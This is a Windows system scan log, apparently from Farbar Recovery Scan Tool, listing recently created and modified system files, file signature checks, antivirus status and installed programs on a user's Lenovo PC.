2014-10-15 13:53 - 2014-07-06 20:40 - 00008192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\spwmp.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msdxm.ocx
2014-10-15 13:53 - 2014-07-06 20:40 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxmasf.dll
2014-10-15 13:53 - 2014-07-06 20:39 - 12625408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmploc.DLL
2014-10-15 13:53 - 2014-07-06 20:39 - 03970488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2014-10-15 13:53 - 2014-07-06 20:39 - 03914680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2014-10-15 13:53 - 2014-07-06 20:39 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rrinstaller.exe
2014-10-15 13:53 - 2014-07-06 20:39 - 00023040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfpmp.exe
2014-10-15 13:53 - 2014-07-06 20:37 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mferror.dll
2014-10-15 13:53 - 2014-06-27 19:21 - 00619056 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe
2014-10-15 13:53 - 2014-06-27 19:21 - 00532176 _____ (Microsoft Corporation) C:\Windows\system32\winresume.exe
2014-10-15 13:53 - 2014-06-27 19:21 - 00457400 _____ (Microsoft Corporation) C:\Windows\system32\ci.dll
2014-10-15 13:53 - 2014-06-18 17:23 - 01943696 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll
2014-10-15 13:53 - 2014-06-18 17:23 - 01131664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dfshim.dll
2014-10-15 13:53 - 2014-06-18 17:23 - 00156824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscorier.dll
2014-10-15 13:53 - 2014-06-18 17:23 - 00156312 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll
2014-10-15 13:53 - 2014-06-18 17:23 - 00081560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscories.dll
2014-10-15 13:53 - 2014-06-18 17:23 - 00073880 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll
2014-10-15 13:52 - 2014-10-09 21:00 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-10-15 13:52 - 2014-10-06 21:54 - 00378552 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-10-15 13:52 - 2014-10-06 21:04 - 00331448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2014-10-15 13:52 - 2014-09-25 17:50 - 13619200 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-10-15 13:52 - 2014-09-25 17:46 - 00365056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2014-10-15 13:52 - 2014-09-25 17:46 - 00243200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2014-10-15 13:52 - 2014-09-25 17:46 - 00069632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2014-10-15 13:52 - 2014-09-25 17:43 - 11807232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2014-10-15 13:52 - 2014-09-25 17:32 - 02017280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2014-10-15 13:52 - 2014-09-25 17:31 - 02108416 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-10-15 13:52 - 2014-09-18 21:25 - 23631360 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-10-15 13:52 - 2014-09-18 20:56 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-10-15 13:52 - 2014-09-18 20:55 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-10-15 13:52 - 2014-09-18 20:44 - 17484800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-10-15 13:52 - 2014-09-18 20:41 - 02796032 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-10-15 13:52 - 2014-09-18 20:40 - 00547328 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-10-15 13:52 - 2014-09-18 20:40 - 00066048 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-10-15 13:52 - 2014-09-18 20:39 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-10-15 13:52 - 2014-09-18 20:38 - 00083968 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-10-15 13:52 - 2014-09-18 20:36 - 05829632 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-10-15 13:52 - 2014-09-18 20:31 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-10-15 13:52 - 2014-09-18 20:30 - 00033792 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-10-15 13:52 - 2014-09-18 20:27 - 00595968 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-10-15 13:52 - 2014-09-18 20:26 - 00139264 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-10-15 13:52 - 2014-09-18 20:25 - 04201472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2014-10-15 13:52 - 2014-09-18 20:25 - 00758272 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-10-15 13:52 - 2014-09-18 20:25 - 00111616 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-10-15 13:52 - 2014-09-18 20:18 - 00940032 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-10-15 13:52 - 2014-09-18 20:14 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-10-15 13:52 - 2014-09-18 20:14 - 00446464 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-10-15 13:52 - 2014-09-18 20:06 - 00072704 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-10-15 13:52 - 2014-09-18 20:02 - 00454656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2014-10-15 13:52 - 2014-09-18 20:01 - 00195584 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-10-15 13:52 - 2014-09-18 20:01 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2014-10-15 13:52 - 2014-09-18 20:01 - 00051200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2014-10-15 13:52 - 2014-09-18 20:00 - 00085504 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-10-15 13:52 - 2014-09-18 19:59 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2014-10-15 13:52 - 2014-09-18 19:58 - 00289280 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-10-15 13:52 - 2014-09-18 19:55 - 02187264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2014-10-15 13:52 - 2014-09-18 19:54 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2014-10-15 13:52 - 2014-09-18 19:53 - 00032768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2014-10-15 13:52 - 2014-09-18 19:51 - 00440320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2014-10-15 13:52 - 2014-09-18 19:50 - 00112128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2014-10-15 13:52 - 2014-09-18 19:49 - 00597504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2014-10-15 13:52 - 2014-09-18 19:42 - 00731136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-10-15 13:52 - 2014-09-18 19:42 - 00710656 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-10-15 13:52 - 2014-09-18 19:40 - 01249280 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-10-15 13:52 - 2014-09-18 19:36 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2014-10-15 13:52 - 2014-09-18 19:33 - 02309632 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-10-15 13:52 - 2014-09-18 19:32 - 00164864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2014-10-15 13:52 - 2014-09-18 19:20 - 00607744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2014-10-15 13:52 - 2014-09-18 19:18 - 01068032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2014-10-15 13:52 - 2014-09-18 19:14 - 01447936 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-10-15 13:52 - 2014-09-18 18:59 - 01810944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2014-10-15 13:52 - 2014-09-18 18:59 - 00775168 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-10-15 13:52 - 2014-09-18 18:53 - 01190400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2014-10-15 13:52 - 2014-09-18 18:52 - 00678400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2014-10-15 13:52 - 2014-09-17 21:00 - 03241472 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2014-10-15 13:52 - 2014-09-17 20:32 - 02363904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2014-10-15 13:52 - 2014-09-04 00:23 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\rastls.dll
2014-10-15 13:52 - 2014-09-04 00:04 - 00372736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rastls.dll
2014-10-15 13:52 - 2014-07-16 21:07 - 03722240 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2014-10-15 13:52 - 2014-07-16 21:07 - 01118720 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe
2014-10-15 13:52 - 2014-07-16 21:07 - 00681984 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll
2014-10-15 13:52 - 2014-07-16 21:07 - 00455168 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe
2014-10-15 13:52 - 2014-07-16 21:07 - 00235520 _____ (Microsoft Corporation) C:\Windows\system32\winsta.dll
2014-10-15 13:52 - 2014-07-16 21:07 - 00150528 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorekmts.dll
2014-10-15 13:52 - 2014-07-16 21:07 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2014-10-15 13:52 - 2014-07-16 21:07 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2014-10-15 13:52 - 2014-07-16 20:40 - 00157696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winsta.dll
2014-10-15 13:52 - 2014-07-16 20:39 - 03221504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2014-10-15 13:52 - 2014-07-16 20:39 - 01051136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstsc.exe
2014-10-15 13:52 - 2014-07-16 20:39 - 00131584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\aaclient.dll
2014-10-15 13:52 - 2014-07-16 20:39 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2014-10-15 13:52 - 2014-07-16 20:39 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2014-10-15 13:52 - 2014-07-16 20:21 - 00212480 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpwd.sys
2014-10-15 13:52 - 2014-07-16 20:21 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tssecsrv.sys
2014-10-15 13:51 - 2014-09-12 20:58 - 00077312 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll
2014-10-15 13:51 - 2014-09-12 20:40 - 00067072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\packager.dll

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-11-02 21:01 - 2011-11-26 19:42 - 01217324 _____ () C:\Windows\WindowsUpdate.log
2014-11-02 20:44 - 2014-06-28 15:22 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-11-02 20:01 - 2009-07-13 23:45 - 00031296 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-11-02 20:01 - 2009-07-13 23:45 - 00031296 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-11-02 20:00 - 2009-07-14 00:13 - 00786662 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-11-02 19:57 - 2014-01-21 14:19 - 00001015 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\LogMeIn Client.lnk
2014-11-02 19:57 - 2014-01-21 14:19 - 00000999 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\LogMeIn Control Panel.lnk
2014-11-02 19:54 - 2012-02-11 21:13 - 00000528 _____ () C:\Windows\Tasks\PCDoctorBackgroundMonitorTask.job
2014-11-02 19:54 - 2012-02-11 21:13 - 00000466 _____ () C:\Windows\Tasks\SystemToolsDailyTest.job
2014-11-02 19:54 - 2009-07-14 00:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-11-02 17:49 - 2012-02-11 21:11 - 00000000 ____D () C:\Users\Deborah
2014-11-02 16:00 - 2012-02-11 21:13 - 00003498 _____ () C:\Windows\System32\Tasks\SystemToolsDailyTest
2014-11-02 16:00 - 2012-02-11 21:13 - 00003448 _____ () C:\Windows\System32\Tasks\PCDEventLauncher
2014-11-02 11:34 - 2012-08-08 23:01 - 00000000 ____D () C:\Users\Deborah\AppData\Local\CrashDumps
2014-11-02 11:24 - 2012-02-12 01:06 - 00000000 ____D () C:\ProgramData\MFAData
2014-11-02 07:51 - 2013-07-10 12:18 - 00000000 ____D () C:\ProgramData\LogMeIn
2014-10-31 05:03 - 2013-07-10 12:22 - 00002441 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader XI.lnk
2014-10-31 04:59 - 2011-11-26 20:04 - 00000000 ____D () C:\Program Files\Google
2014-10-31 04:59 - 2011-11-26 20:03 - 00000000 ____D () C:\Program Files (x86)\Google
2014-10-31 04:23 - 2012-02-11 21:25 - 00000000 ____D () C:\Users\Deborah\AppData\Local\Google
2014-10-31 04:23 - 2011-11-26 20:04 - 00000000 ____D () C:\ProgramData\Google
2014-10-27 11:35 - 2014-06-28 15:22 - 00001113 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-10-27 11:35 - 2014-06-28 15:22 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-27 11:35 - 2014-06-28 15:22 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-10-21 09:54 - 2012-02-12 01:08 - 00000000 ____D () C:\Program Files (x86)\AVG
2014-10-21 09:53 - 2014-03-31 08:38 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG
2014-10-21 09:53 - 2012-07-23 09:18 - 00000000 ___HD () C:\$AVG
2014-10-16 08:33 - 2009-07-13 23:57 - 00001547 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2014-10-16 03:10 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\rescache
2014-10-16 02:33 - 2009-07-13 23:45 - 00455760 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-10-16 02:30 - 2014-05-07 02:00 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-10-16 02:30 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\SysWOW64\Dism
2014-10-16 02:30 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\system32\Dism
2014-10-16 02:07 - 2014-06-28 15:03 - 00000000 ____D () C:\Windows\system32\MRT
2014-10-16 02:00 - 2012-02-11 22:10 - 103265616 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2014-10-25 23:54

==================== End Of Log ============================

 

Additional Log:

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 02-11-2014
Ran by Deborah at 2014-11-02 22:15:57
Running from C:\Users\Deborah\Downloads
Boot Mode: Normal
==========================================================

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: AVG AntiVirus Free Edition 2015 (Enabled - Up to date) {0E9420C4-06B3-7FA0-3AB1-6E49CB52ECD9}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: AVG AntiVirus Free Edition 2015 (Enabled - Up to date) {B5F5C120-2089-702E-0001-553BB0D5A664}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Access Help (HKLM-x32\...\{C6FA39A7-26B1-480A-BC74-6D17531AC222}) (Version: 2.00 - Lenovo)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 3.1.0.4880 - Adobe Systems Incorporated)
Adobe Flash Player 10 Plugin (HKLM-x32\...\{0DFB3DE8-65B9-44FF-AA0A-3BECC5A2BFD1}) (Version: 10.0.32.18 - Adobe Systems, Inc.)
Adobe Flash Player 12 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 12.0.0.44 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.09) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.09 - Adobe Systems Incorporated)
AVG 2015 (HKLM\...\AVG) (Version: 2015.0.5315 - AVG Technologies)
AVG 2015 (Version: 15.0.4189 - AVG Technologies) Hidden
AVG 2015 (Version: 15.0.5315 - AVG Technologies) Hidden
AVG Security Toolbar (HKLM-x32\...\AVG Secure Search) (Version: 18.1.9.799 - AVG Technologies)
Canon Easy-WebPrint EX (HKLM-x32\...\Easy-WebPrint EX) (Version: 1.4.1.0 - Canon Inc.)
Canon IJ Network Scanner Selector EX (HKLM-x32\...\Canon_IJ_Network_Scanner_Selector_EX) (Version:  - Canon Inc.)
Canon IJ Network Tool (HKLM-x32\...\Canon_IJ_Network_UTILITY) (Version: 3.2.0 - Canon Inc.)
Canon IJ Scan Utility (HKLM-x32\...\Canon_IJ_Scan_Utility) (Version:  - Canon Inc.)
Canon MX920 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MX920_series) (Version: 1.00 - Canon Inc.)
Canon MX920 series On-screen Manual (HKLM-x32\...\Canon MX920 series On-screen Manual) (Version: 7.6.0 - Canon Inc.)
Canon MX920 series User Registration (HKLM-x32\...\Canon MX920 series User Registration) (Version:  - ‭Canon Inc.)
Canon My Image Garden (HKLM-x32\...\Canon My Image Garden) (Version: 1.1.0 - Canon Inc.)
Canon My Image Garden Design Files (HKLM-x32\...\Canon My Image Garden Design Files) (Version: 1.0.1 - Canon Inc.)
Canon My Printer (HKLM-x32\...\CanonMyPrinter) (Version: 3.1.0 - Canon Inc.)
Canon Quick Menu (HKLM-x32\...\CanonQuickMenu) (Version: 2.1.0 - Canon Inc.)
Canon Speed Dial Utility (HKLM-x32\...\Speed Dial Utility) (Version: 1.3.0 - Canon Inc.)
CCleaner (HKLM\...\CCleaner) (Version: 3.15 - Piriform)
Citrix Presentation Server Client - Web Only (HKLM-x32\...\{E9459BCF-0982-498B-ABA7-26C34323493F}) (Version: 10.200.2650 - Citrix Systems, Inc.)
Create Recovery Media (HKLM-x32\...\{50DC5136-21E8-48BC-97E5-1AD055F6B0B6}) (Version: 1.20.0.00 - Lenovo Group Limited)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
DirectX 9 Runtime (x32 Version: 1.00.0000 - Sonic Solutions) Hidden
D-Link DWA-125 (HKLM-x32\...\{E45CACFE-0576-4375-A84F-C34B99A7B652}) (Version:  - D-Link)
EaseUS Todo Backup Free 4.0 (HKLM-x32\...\EaseUS Todo Backup Free 4.0_is1) (Version: 4.0.0.1 - CHENGDU YIWO Tech Development Co., Ltd)
Free PDF to Word Converter 5.1.0.383 (HKLM\...\Free PDF to Word Converter_is1) (Version: 5.1.0.383 - Smart Soft)
GoToAssist Customer 2.2.0.758 (HKLM-x32\...\GoToAssist Express Customer) (Version: 2.2.0.758 - Citrix Online)
HP Officejet 6500 E710a-f Basic Device Software (HKLM\...\{EC21DBC6-C760-463D-8866-BFACBB28A3E3}) (Version: 22.50.231.0 - Hewlett-Packard Co.)
HP Officejet 6500 E710a-f Help (HKLM-x32\...\{037CD593-D760-4A00-B030-7BBAFA1123FE}) (Version: 140.0.2.2 - Hewlett Packard)
HP Officejet 6500 E710n-z Basic Device Software (HKLM\...\{ADDF4B84-5D28-4EAE-8511-EF808C8BC81C}) (Version: 22.50.231.0 - Hewlett-Packard Co.)
HP Officejet 6500 E710n-z Help (HKLM-x32\...\{130E5108-547F-4482-91EE-F45C784E08C7}) (Version: 140.0.2.2 - Hewlett Packard)
I.R.I.S. OCR (HKLM-x32\...\{CA6BCA2F-EDEB-408F-850B-31404BE16A61}) (Version: 12.3.4.0 - HP)
Intel® Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version: 8.15.10.1872 - Intel Corporation)
Intel® Management Engine Interface (HKLM\...\HECI) (Version:  - Intel Corporation)
Intel® Network Connections Drivers (HKLM\...\PROSet) (Version: 14.5 - Intel)
Intel® Active Management Technology (HKLM\...\MESOL) (Version:  - Intel Corporation)
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Lenovo Mouse Suite (HKLM\...\MouseSuite98) (Version: 6.45 - Lenovo)
Lenovo Registration (HKLM-x32\...\{6707C034-ED6B-4B6A-B21F-969B3606FBDE}) (Version: 1.0.4 - Lenovo Inc.)
Lenovo ThinkVantage Toolbox (HKLM\...\PC-Doctor for Windows) (Version: 6.0.5849.23 - PC-Doctor, Inc.)
Lenovo Welcome (HKLM-x32\...\Lenovo Welcome_is1) (Version: 2.02.003.0 - Lenovo)
LogMeIn (HKLM-x32\...\{CB7AF84A-1B7F-4C6B-8A58-EB7CDE48C23A}) (Version: 4.1.3268 - LogMeIn, Inc.)
Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation)
Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Message Center Plus (HKLM-x32\...\{FD331A3B-F7A5-4C31-B8D4-DF413C85AF7A}) (Version: 2.0.0012.00 - Lenovo Group Limited)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Office Standard 2010 (HKLM\...\Office14.STANDARDR) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM-x32\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 4.0.50401.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
PDFCreator (HKLM-x32\...\{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}) (Version: 1.2.3 - Frank Heindörfer, Philip Chinery)
PowerChute Personal Edition 3.0.2 (HKLM-x32\...\{8ED262EE-FC73-47A9-BB86-D92223246881}) (Version: 3.0.2 - Schneider Electric)
Rescue and Recovery (HKLM-x32\...\{B383F243-0ABC-4E56-AA30-923B8D85076E}) (Version: 4.30.0025.00 - Lenovo Group Limited)
Roxio Creator Business Edition (HKLM-x32\...\{537BF16E-7412-448C-95D8-846E85A1D817}) (Version: 10.3 - Roxio)
Sonic CinePlayer Decoder Pack (x32 Version: 4.3.0 - Sonic Solutions) Hidden
Sonic Icons for Lenovo (HKLM-x32\...\{B334D9AE-1393-423E-97C0-3BDC3360E692}) (Version: 2.0.0 - Lenovo)
SoundMAX (HKLM-x32\...\{F0A37341-D692-11D4-A984-009027EC0A9C}) (Version: 6.10.2.6595 - Analog Devices)
System Update (HKLM-x32\...\{25C64847-B900-48AD-A164-1B4F9B774650}) (Version: 4.01.0015 - Lenovo)
ThinkVantage Power Manager (HKLM-x32\...\{DAC01CEE-5BAE-42D5-81FC-B687E84E8405}) (Version: 1.04.0023 - Lenovo Group Limited)
TotalMD 2011 SP2 (HKLM-x32\...\TotalMD For Networks_is1) (Version:  - Dentimax, LLC)
VD64Inst (Version: 1.00.0000 - Roxio, Inc.) Hidden
Visual Studio 2008 x64 Redistributables (HKLM-x32\...\{FCDBEA60-79F0-4FAE-BBA8-55A26C609A49}) (Version: 10.0.0.2 - AVG Technologies)
Visual Studio 2010 x64 Redistributables (HKLM\...\{21B133D6-5979-47F0-BE1C-F6A6B304693F}) (Version: 13.0.0.1 - AVG Technologies)
Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies)
Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
Windows Automated Installation Kit (HKLM\...\{31E8F586-4EF7-4500-844D-BA8756474FF1}) (Version: 2.0.0.0 - Microsoft Corporation)
Windows Driver Package - AnalogDevices (ADIHdAudAddService) MEDIA  (08/05/2009 6.10.02.6595) (HKLM\...\A5711FCDB123FDFC12A06CDCA7EA8C60F8370DC5) (Version: 08/05/2009 6.10.02.6595 - AnalogDevices)
Windows Driver Package - Intel (e1kexpress) Net  (06/22/2009 11.0.41.0) (HKLM\...\47953DA64A58724946E1C1EAFF72D4D6138B69F9) (Version: 06/22/2009 11.0.41.0 - Intel)
Windows Driver Package - Intel (HECIx64) System  (06/23/2009 5.2.0.1008) (HKLM\...\4CF241D8BEE94EE801F312E8B49B8E5BAA90F29A) (Version: 06/23/2009 5.2.0.1008 - Intel)
Windows Driver Package - Intel (Serial) Ports  (07/06/2009 5.5.1.1012) (HKLM\...\49AA6E0E36A92D25AFC2479DC7BCB705AE01CE1F) (Version: 07/06/2009 5.5.1.1012 - Intel)
Windows Driver Package - Intel Corporation (igfx) Display  (08/13/2009 8.15.10.1872) (HKLM\...\157624FFB8919EB5518C572408100A734456F2E0) (Version: 08/13/2009 8.15.10.1872 - Intel Corporation)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3508.1109 - Microsoft Corporation)
Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

